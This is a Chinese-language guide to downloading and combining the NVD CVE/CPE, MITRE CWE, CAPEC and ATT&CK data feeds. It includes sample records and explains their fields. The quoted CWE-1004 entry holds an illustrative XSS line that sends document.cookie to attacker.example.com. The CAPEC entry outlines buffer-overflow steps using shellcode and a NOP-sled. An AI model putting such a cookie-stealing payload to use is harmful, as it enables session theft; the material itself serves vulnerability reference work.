CVE CWE CPE CAPEC ATT&CK 整合数据下载连接和构成
数据构成
目录
- CPE
- CVE.json
- CWE.xml
- CAPEC.xml
- ATK technique.json
CPE
cpe的数据本项目好像没有专门的下载网址,他是从cve的关联信息提取出来的,不包含描述以及其他信息。
看了官网的数据:https://nvd.nist.gov/products/cpe
其实只包含版本和cpe-id这样就和后文的cve直接提取没有区别
<cpe-item name="cpe:/a:%240.99_kindle_books_project:%240.99_kindle_books:6::~~~android~~">
<title xml:lang="en-US">$0.99 Kindle Books project $0.99 Kindle Books (aka com.kindle.books.for99) for android 6.0title>
<references>
<reference href="https://play.google.com/store/apps/details?id=com.kindle.books.for99">Product informationreference>
<reference href="https://docs.google.com/spreadsheets/d/1t5GXwjw82SyunALVJb2w0zi3FoLRIkfGPc7AMjRF0r4/edit?pli=1#gid=1053404143">Government Advisoryreference>
references>
<cpe-23:cpe23-item name="cpe:2.3:a:\$0.99_kindle_books_project:\$0.99_kindle_books:6:*:*:*:*:android:*:*"/>
cpe-item>
<cpe-item name="cpe:/a:%40nubosoftware%2fnode-static_project:%40nubosoftware%2fnode-static:-::~~~node.js~~">
<title xml:lang="en-US">@nubosoftware/node-static Project @nubosoftware/node-static for Node.jstitle>
<references>
<reference href="https://www.npmjs.com/package/@nubosoftware/node-static">Projectreference>
references>
<cpe-23:cpe23-item name="cpe:2.3:a:\@nubosoftware\/node-static_project:\@nubosoftware\/node-static:-:*:*:*:*:node.js:*:*"/>
cpe-item>
CVE.json
下载网站https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2014.json.gz
nvdcve-1.1-2014.json.gz 其中 2014可以改成任意年份 代码是通过输入初始年份和截止年份下载所有年份的cve数据进行汇总形成cve数据。
{ "cve" : {
"data_type" : "CVE",
"data_format" : "MITRE",
"data_version" : "4.0",
"CVE_data_meta" : {
"ID" : "CVE-2021-0001",
"ASSIGNER" : "[email protected]"
},
"problemtype" : {
"problemtype_data" : [ {
"description" : [ {
"lang" : "en",
"value" : "CWE-203"
} ]
} ]
},
"references" : {
"reference_data" : [ {
"url" : "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00477.html",
"name" : "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00477.html",
"refsource" : "MISC",
"tags" : [ "Patch", "Vendor Advisory" ]
} ]
},
"description" : {
"description_data" : [ {
"lang" : "en",
"value" : "Observable timing discrepancy in Intel(R) IPP before version 2020 update 1 may allow authorized user to potentially enable information disclosure via local access."
} ]
}
},
"configurations" : {
"CVE_data_version" : "4.0",
"nodes" : [ {
"operator" : "OR",
"children" : [ ],
"cpe_match" : [ {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_4:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_3:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:-:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_1:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2019:update_2:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:integrated_performance_primitives_cryptography:2020:-:*:*:*:*:*:*",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_dcap:*:*:*:*:*:linux:*:*",
"versionEndIncluding" : "1.10.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_sdk:*:*:*:*:*:linux:*:*",
"versionEndIncluding" : "2.13.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_dcap:*:*:*:*:*:windows:*:*",
"versionEndIncluding" : "1.10.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_psw:*:*:*:*:*:linux:*:*",
"versionEndIncluding" : "2.13.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_psw:*:*:*:*:*:windows:*:*",
"versionEndIncluding" : "2.12.100.4",
"cpe_name" : [ ]
}, {
"vulnerable" : true,
"cpe23Uri" : "cpe:2.3:a:intel:sgx_sdk:*:*:*:*:*:windows:*:*",
"versionEndIncluding" : "2.12.100.4",
"cpe_name" : [ ]
} ]
} ]
},
"impact" : {
"baseMetricV3" : {
"cvssV3" : {
"version" : "3.1",
"vectorString" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"attackVector" : "LOCAL",
"attackComplexity" : "HIGH",
"privilegesRequired" : "LOW",
"userInteraction" : "NONE",
"scope" : "UNCHANGED",
"confidentialityImpact" : "HIGH",
"integrityImpact" : "NONE",
"availabilityImpact" : "NONE",
"baseScore" : 4.7,
"baseSeverity" : "MEDIUM"
},
"exploitabilityScore" : 1.0,
"impactScore" : 3.6
},
"baseMetricV2" : {
"cvssV2" : {
"version" : "2.0",
"vectorString" : "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"accessVector" : "LOCAL",
"accessComplexity" : "LOW",
"authentication" : "NONE",
"confidentialityImpact" : "PARTIAL",
"integrityImpact" : "NONE",
"availabilityImpact" : "NONE",
"baseScore" : 2.1
},
"severity" : "LOW",
"exploitabilityScore" : 3.9,
"impactScore" : 2.9,
"acInsufInfo" : false,
"obtainAllPrivilege" : false,
"obtainUserPrivilege" : false,
"obtainOtherPrivilege" : false,
"userInteractionRequired" : false
}
},
"publishedDate" : "2021-06-09T20:15Z",
"lastModifiedDate" : "2021-06-28T18:03Z"
}
这里只解释一些需要解释的
problemtype表示问题类型,其中包含与其有关联的cwe
references表示引用信息的来源
description表示对其的描述
cpe23Uri表示的是被cve影响的cpe的id,可以关联cpe
baseMetricV3表示的基本指标V3的信息,其中有cvssV3
baseMetricV2表示的基本指标V2的信息,其中有cvssV2
vectorString表示CVSS向量字符串,用于描述漏洞的特征和严重程度。
attackVector表示攻击向量,此处为"LOCAL",表示攻击需要局部访问权限。
attackComplexity表示攻击复杂性,此处为"HIGH",表示攻击相对复杂。
privilegesRequired表示所需特权级别,此处为"LOW",表示攻击者需要较低的特权级别。
userInteraction表示用户交互级别,此处为"NONE",表示攻击不需要用户交互。
scope表示影响范围,此处为"UNCHANGED",表示攻击不会扩展到其他组件或资源。
confidentialityImpact表示机密性影响,此处为"HIGH",表示漏洞可能导致高机密性信息泄露。
integrityImpact表示完整性影响
availabilityImpact表示可用性影响
baseScore表示基础分数
baseSeverity表示基础严重性级别
exploitabilityScore表示可利用性分数
impactScore表示影响分数
CWE.xml
下载地址:http://cwe.mitre.org/data/xml/cwec_latest.xml.zip
<Weakness ID="1004" Name="Sensitive Cookie Without 'HttpOnly' Flag" Abstraction="Variant" Structure="Simple" Status="Incomplete">
<Description>The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.Description>
<Extended_Description>The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.Extended_Description>
<Related_Weaknesses>
<Related_Weakness Nature="ChildOf" CWE_ID="732" View_ID="1000" Ordinal="Primary"/>
Related_Weaknesses>
<Applicable_Platforms>
<Language Class="Not Language-Specific" Prevalence="Undetermined"/>
<Technology Class="Web Based" Prevalence="Undetermined"/>
Applicable_Platforms>
<Background_Details>
<Background_Detail>An HTTP cookie is a small piece of data attributed to a specific website and stored on the user's computer by the user's web browser. This data can be leveraged for a variety of purposes including saving information entered into form fields, recording user activity, and for authentication purposes. Cookies used to save or record information generated by the user are accessed and modified by script code embedded in a web page. While cookies used for authentication are created by the website's server and sent to the user to be attached to future requests. These authentication cookies are often not meant to be accessed by the web page sent to the user, and are instead just supposed to be attached to future requests to verify authentication details.Background_Detail>
Background_Details>
<Modes_Of_Introduction>
<Introduction>
<Phase>ImplementationPhase>
Introduction>
Modes_Of_Introduction>
<Likelihood_Of_Exploit>MediumLikelihood_Of_Exploit>
<Common_Consequences>
<Consequence>
<Scope>ConfidentialityScope>
<Impact>Read Application DataImpact>
<Note>If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.Note>
Consequence>
<Consequence>
<Scope>IntegrityScope>
<Impact>Gain Privileges or Assume IdentityImpact>
<Note>If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.Note>
Consequence>
Common_Consequences>
<Detection_Methods>
<Detection_Method Detection_Method_ID="DM-14">
<Method>Automated Static AnalysisMethod>
<Description>Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)Description>
<Effectiveness>HighEffectiveness>
Detection_Method>
Detection_Methods>
<Potential_Mitigations>
<Mitigation>
<Phase>ImplementationPhase>
<Description>Leverage the HttpOnly flag when setting a sensitive cookie in a response.Description>
<Effectiveness>HighEffectiveness>
<Effectiveness_Notes>While this mitigation is effective for protecting cookies from a browser's own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie.Effectiveness_Notes>
Mitigation>
Potential_Mitigations>
<Demonstrative_Examples>
<Demonstrative_Example>
<Intro_Text>In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.Intro_Text>
<Body_Text>The snippet of code below establishes a new cookie to hold the sessionID.Body_Text>
<Example_Code Nature="Bad" Language="Java">
<xhtml:div>String sessionID = generateSessionId();<xhtml:br/>Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>response.addCookie(c);xhtml:div>
Example_Code>
<Body_Text>The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:Body_Text>
<Example_Code Nature="Attack" Language="JavaScript">
<xhtml:div>document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'xhtml:div>
Example_Code>
<Body_Text>When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.Body_Text>
<Body_Text>To mitigate the risk, use the setHttpOnly(true) method.Body_Text>
<Example_Code Nature="Good" Language="Java">
<xhtml:div>String sessionID = generateSessionId();<xhtml:br/>Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>c.setHttpOnly(true);<xhtml:br/>response.addCookie(c);xhtml:div>
Example_Code>
Demonstrative_Example>
Demonstrative_Examples>
<Observed_Examples>
<Observed_Example>
<Reference>CVE-2014-3852Reference>
<Description>CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.Description>
<Link>https://www.cve.org/CVERecord?id=CVE-2014-3852Link>
Observed_Example>
<Observed_Example>
<Reference>CVE-2015-4138Reference>
<Description>Appliance for managing encrypted communications does not use HttpOnly flag.Description>
<Link>https://www.cve.org/CVERecord?id=CVE-2015-4138Link>
Observed_Example>
Observed_Examples>
<References>
<Reference External_Reference_ID="REF-2"/>
<Reference External_Reference_ID="REF-3"/>
<Reference External_Reference_ID="REF-4"/>
<Reference External_Reference_ID="REF-5"/>
References>
<Mapping_Notes>
<Usage>AllowedUsage>
<Rationale>This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.Rationale>
<Comments>Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.Comments>
<Reasons>
<Reason Type="Acceptable-Use"/>
Reasons>
Mapping_Notes>
<Content_History>
<Submission>
<Submission_Name>CWE Content TeamSubmission_Name>
<Submission_Organization>MITRESubmission_Organization>
<Submission_Date>2017-01-02Submission_Date>
<Submission_Version>2.10Submission_Version>
<Submission_ReleaseDate>2017-01-19Submission_ReleaseDate>
Submission>
<Modification>
<Modification_Name>CWE Content TeamModification_Name>
<Modification_Organization>MITREModification_Organization>
<Modification_Date>2017-11-08Modification_Date>
<Modification_Comment>updated Applicable_Platforms, References, RelationshipsModification_Comment>
Modification>
<Modification>
<Modification_Name>CWE Content TeamModification_Name>
<Modification_Organization>MITREModification_Organization>
<Modification_Date>2020-02-24Modification_Date>
<Modification_Comment>updated Applicable_Platforms, RelationshipsModification_Comment>
Modification>
<Modification>
<Modification_Name>CWE Content TeamModification_Name>
<Modification_Organization>MITREModification_Organization>
<Modification_Date>2021-10-28Modification_Date>
<Modification_Comment>updated RelationshipsModification_Comment>
Modification>
<Modification>
<Modification_Name>CWE Content TeamModification_Name>
<Modification_Organization>MITREModification_Organization>
<Modification_Date>2023-01-31Modification_Date>
<Modification_Comment>updated DescriptionModification_Comment>
Modification>
<Modification>
<Modification_Name>CWE Content TeamModification_Name>
<Modification_Organization>MITREModification_Organization>
<Modification_Date>2023-04-27Modification_Date>
<Modification_Comment>updated Detection_Factors, References, Relationships, Time_of_IntroductionModification_Comment>
Modification>
<Modification>
<Modification_Name>CWE Content TeamModification_Name>
<Modification_Organization>MITREModification_Organization>
<Modification_Date>2023-06-29Modification_Date>
<Modification_Comment>updated Mapping_NotesModification_Comment>
Modification>
Content_History>
Nature 表示代码的性质(“Bad” 表示有问题的代码,“Attack” 表示攻击代码,“Good” 表示修复后的代码),Language 表示代码的语言(这里是 Java)。
元素提供了案例的链接,通常是指向CVE记录的链接,提供更详细的信息。
CAPEC.xml
下载地址:http://capec.mitre.org/data/xml/capec_latest.xml
<Attack_Pattern ID="10" Name="Buffer Overflow via Environment Variables" Abstraction="Detailed"
Status="Draft">
<Description>This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.Description>
<Extended_Description>Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary's shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.Extended_Description>
<Likelihood_Of_Attack>HighLikelihood_Of_Attack>
<Typical_Severity>HighTypical_Severity>
<Related_Attack_Patterns>
<Related_Attack_Pattern Nature="ChildOf" CAPEC_ID="100"/>
Related_Attack_Patterns>
<Execution_Flow>
<Attack_Step>
<Step>1Step>
<Phase>ExplorePhase>
<Description>[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer.Description>
Attack_Step>
<Attack_Step>
<Step>2Step>
<Phase>ExperimentPhase>
<Description>[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.Description>
<Technique>Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found.Technique>
Attack_Step>
<Attack_Step>
<Step>3Step>
<Phase>ExperimentPhase>
<Description>[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.Description>
<Technique>Create malicious shellcode that will execute when the program execution is returned to it.Technique>
<Technique>Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPsTechnique>
Attack_Step>
<Attack_Step>
<Step>4Step>
<Phase>ExploitPhase>
<Description>[Overflow the buffer] Using the injection vector, the adversary injects the crafted overflow content into the buffer.Description>
Attack_Step>
Execution_Flow>
<Prerequisites>
<Prerequisite>The application uses environment variables.Prerequisite>
<Prerequisite>An environment variable exposed to the user is vulnerable to a buffer overflow.Prerequisite>
<Prerequisite>The vulnerable environment variable uses untrusted data.Prerequisite>
<Prerequisite>Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer.Prerequisite>
Prerequisites>
<Skills_Required>
<Skill Level="Low">An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.Skill>
<Skill Level="High">Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.Skill>
Skills_Required>
<Indicators>
<Indicator>If the application does bound checking, it should fail when the data source is larger than the size of the destination buffer. If the application's code is well written, that failure should trigger an alert.Indicator>
Indicators>
<Consequences>
<Consequence>
<Scope>AvailabilityScope>
<Impact>Unreliable ExecutionImpact>
Consequence>
<Consequence>
<Scope>ConfidentialityScope>
<Scope>IntegrityScope>
<Scope>AvailabilityScope>
<Impact>Execute Unauthorized CommandsImpact>
<Note>Run Arbitrary CodeNote>
Consequence>
<Consequence>
<Scope>ConfidentialityScope>
<Impact>Read DataImpact>
Consequence>
<Consequence>
<Scope>IntegrityScope>
<Impact>Modify DataImpact>
Consequence>
<Consequence>
<Scope>ConfidentialityScope>
<Scope>Access ControlScope>
<Scope>AuthorizationScope>
<Impact>Gain PrivilegesImpact>
Consequence>
Consequences>
<Mitigations>
<Mitigation>Do not expose environment variable to the user.Mitigation>
<Mitigation>Do not use untrusted data in your environment variables.Mitigation>
<Mitigation>Use a language or compiler that performs automatic bounds checkingMitigation>
<Mitigation>There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.Mitigation>
Mitigations>
<Example_Instances>
<Example>
<xhtml:p>A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. See also: CVE-1999-0906xhtml:p>
Example>
<Example>
<xhtml:p>A buffer overflow in the rlogin program involves its consumption of the $TERM environmental variable. See also: CVE-1999-0046xhtml:p>
Example>
Example_Instances>
<Related_Weaknesses>
<Related_Weakness CWE_ID="120"/>
<Related_Weakness CWE_ID="302"/>
<Related_Weakness CWE_ID="118"/>
<Related_Weakness CWE_ID="119"/>
<Related_Weakness CWE_ID="74"/>
<Related_Weakness CWE_ID="99"/>
<Related_Weakness CWE_ID="20"/>
<Related_Weakness CWE_ID="680"/>
<Related_Weakness CWE_ID="733"/>
<Related_Weakness CWE_ID="697"/>
Related_Weaknesses>
<Taxonomy_Mappings>
<Taxonomy_Mapping Taxonomy_Name="OWASP Attacks">
<Entry_Name>Buffer Overflow via Environment VariablesEntry_Name>
Taxonomy_Mapping>
Taxonomy_Mappings>
<References>
<Reference External_Reference_ID="REF-1"/>
<Reference External_Reference_ID="REF-2"/>
References>
<Content_History>
<Submission>
<Submission_Name>CAPEC Content TeamSubmission_Name>
<Submission_Organization>The MITRE CorporationSubmission_Organization>
<Submission_Date>2014-06-23Submission_Date>
Submission>
<Modification>
<Modification_Name>CAPEC Content TeamModification_Name>
<Modification_Organization>The MITRE CorporationModification_Organization>
<Modification_Date>2017-01-09Modification_Date>
<Modification_Comment>Updated Related_Attack_PatternsModification_Comment>
Modification>
<Modification>
<Modification_Name>CAPEC Content TeamModification_Name>
<Modification_Organization>The MITRE CorporationModification_Organization>
<Modification_Date>2018-07-31Modification_Date>
<Modification_Comment>Updated ReferencesModification_Comment>
Modification>
<Modification>
<Modification_Name>CAPEC Content TeamModification_Name>
<Modification_Organization>The MITRE CorporationModification_Organization>
<Modification_Date>2020-07-30Modification_Date>
<Modification_Comment>Updated MitigationsModification_Comment>
Modification>
<Modification>
<Modification_Name>CAPEC Content TeamModification_Name>
<Modification_Organization>The MITRE CorporationModification_Organization>
<Modification_Date>2020-12-17Modification_Date>
<Modification_Comment>Updated Taxonomy_MappingsModification_Comment>
Modification>
<Modification>
<Modification_Name>CAPEC Content TeamModification_Name>
<Modification_Organization>The MITRE CorporationModification_Organization>
<Modification_Date>2021-10-21Modification_Date>
<Modification_Comment>Updated Execution_Flow, Extended_DescriptionModification_Comment>
Modification>
<Modification>
<Modification_Name>CAPEC Content TeamModification_Name>
<Modification_Organization>The MITRE CorporationModification_Organization>
<Modification_Date>2022-02-22Modification_Date>
<Modification_Comment>Updated DescriptionModification_Comment>
Modification>
<Modification>
<Modification_Name>CAPEC Content TeamModification_Name>
<Modification_Organization>The MITRE CorporationModification_Organization>
<Modification_Date>2022-09-29Modification_Date>
<Modification_Comment>Updated Example_InstancesModification_Comment>
Modification>
Content_History>
Attack_Pattern>
包含了四个
- Explore(探测阶段):
- Experiment(实验阶段):
- Experiment(实验阶段):
- Exploit(利用阶段):
Level 属性,和每个技能水平的简要说明。
ATK technique.json
下载地址:https://github.com/mitre/cti/raw/master/enterprise-attack/enterprise-attack.json
github项目中还可以下载ATT&CK的其他数据
"external_references": [
{
"source_name": "mitre-attack",
"external_id": "T1148",
"url": "https://attack.mitre.org/techniques/T1148"
},
{
"external_id": "CAPEC-13",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/13.html"
}
],
字段有些长我只截取了这一段,这是atk的编号和capec直接关联的信息。
其中也有description和缓解还有防御措施。